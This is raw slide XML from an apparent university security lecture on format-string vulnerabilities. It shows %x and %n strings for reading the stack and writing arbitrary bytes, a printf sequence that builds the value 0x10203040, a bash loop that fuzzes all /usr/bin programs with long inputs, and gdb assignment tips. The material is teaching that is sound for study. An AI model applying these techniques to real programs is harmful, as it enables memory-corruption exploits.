            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>_%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>08x ….%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>08x.%n"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057070" y="3044533"/>
            <a:ext cx="2810330" cy="1070267"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3979"/>
              <a:gd name="adj2" fmla="val -10252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“pop” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dwords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from stack to reach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format string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Arbitrary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Suppose we want to write 0x10203040.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(e.g., for GOT attack in next lecture)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133600"/>
            <a:ext cx="58957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unsigned char canary[5];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unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char foo[4];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err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memset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(foo, ’\x00’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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(canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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("%128u%n",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&amp;foo[3]);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392" y="6350000"/>
            <a:ext cx="260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taken directly from reading</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Title 1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Arbitrary Values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3254521"/>
            <a:ext cx="5791200" cy="124152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89" name="Table 10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143415"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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48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0x41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0x41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0x41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0x41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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938"/>
            <a:ext cx="0" cy="33464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Right Brace 181"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391400" y="2040354"/>
            <a:ext cx="228600" cy="1676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7701948" y="2693888"/>
            <a:ext cx="85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anary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Right Brace 183"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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7701948" y="4412734"/>
            <a:ext cx="49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133600"/>
            <a:ext cx="58957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unsigned char canary[5];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unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char foo[4];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err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memset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(foo, ’\x00’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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(canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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("%128u%n",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&amp;foo[3]);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392" y="6350000"/>
            <a:ext cx="260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taken directly from reading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91400" y="2040354"/>
            <a:ext cx="228600" cy="1676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01948" y="2693888"/>
            <a:ext cx="85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anary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7391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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01948" y="4412734"/>
            <a:ext cx="49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3559076"/>
            <a:ext cx="5791200" cy="124152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89" name="Table 10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41839"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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48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0x41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0x10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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938"/>
            <a:ext cx="0" cy="33464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2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Writing Arbitrary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133600"/>
            <a:ext cx="58957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unsigned char canary[5];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unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char foo[4];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err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memset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(foo, ’\x00’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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(canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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("%128u%n",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&amp;foo[3]);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392" y="6350000"/>
            <a:ext cx="260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taken directly from reading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91400" y="2040354"/>
            <a:ext cx="228600" cy="1676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01948" y="2693888"/>
            <a:ext cx="85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anary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7391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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01948" y="4412734"/>
            <a:ext cx="49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3863876"/>
            <a:ext cx="5791200" cy="124152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89" name="Table 10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175696"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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48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0x20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0x10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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938"/>
            <a:ext cx="0" cy="33464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2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Writing Arbitrary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133600"/>
            <a:ext cx="58957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unsigned char canary[5];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unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char foo[4];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err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memset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(foo, ’\x00’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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(canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4.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("%128u%n",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&amp;foo[3]);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392" y="6350000"/>
            <a:ext cx="260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taken directly from reading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91400" y="2040354"/>
            <a:ext cx="228600" cy="1676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01948" y="2693888"/>
            <a:ext cx="85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anary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7391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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01948" y="4412734"/>
            <a:ext cx="49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400" y="4092476"/>
            <a:ext cx="5791200" cy="124152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89" name="Table 10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89607"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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48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0x40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0x20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0x10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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938"/>
            <a:ext cx="0" cy="33464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2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Writing Arbitrary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133600"/>
            <a:ext cx="58957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unsigned char canary[5];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unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char foo[4];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err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>memset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(foo, ’\x00’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (foo));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0. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strcpy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(canary, "AAAA");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1.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("%16u%n",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&amp;foo[0]);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2.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("%32u%n",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&amp;foo[1]);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3.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("%64u%n",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&amp;foo[2]);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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf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("%128u%n", 7350,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*) &amp;foo[3]); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"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3392" y="6350000"/>
            <a:ext cx="260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taken directly from reading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91400" y="2040354"/>
            <a:ext cx="228600" cy="1676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01948" y="2693888"/>
            <a:ext cx="85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anary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7391400" y="3886200"/>
            <a:ext cx="228600" cy="1422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01948" y="4412734"/>
            <a:ext cx="49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</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1089" name="Table 10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07486"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6550326" y="1585741"/>
          <a:ext cx="76487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48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0x00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0x80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0x40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0x20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0x10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9" name="Line 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4243388" y="1912938"/>
            <a:ext cx="0" cy="33464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2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Writing Arbitrary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in one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dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> ("%16u%n%16u%n%32u%n%64u%n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, (int *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[0], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, (int *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, (int *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[2], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>        1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, (int *) &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[3]); </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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nl-NL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nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Each %n writes 4 bytes, but that doesn’t matter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>nly last byte written is used in the address since we incrementally write each byte of the destination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" sz="2800" dirty="0">
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>See assigned reading for writing an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>arbitrary 4-byte value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>to an arbitrary 4-byte destination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri"/>
              </a:rPr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4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pP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inp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> –e '{print "A"x8000}'`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> for program in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/*; do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   for opt in {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>a..z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>} {A..Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}; do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    timeout –s 9 1s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>         $program -$opt $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> done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953000"/>
            <a:ext cx="8229600" cy="14478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457200" bIns="457200" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:no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ambria"/>
              </a:rPr>
              <a:t>1009 Linux programs. 13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>minutes. 52 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria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Cambria"/>
              </a:rPr>
              <a:t>bugs in 29 programs.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7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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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3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Addresses inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> may be different than on command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> has a slightly different environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Before submitting assignment, make sure you are using the real addresses. You can use “%08x.%08x.” from command line to find real addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> –e ‘print “\x51\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”’` </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to get addresses into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. I don’t know of an easier way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Learn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cheat sheet on website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most important: break-points, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
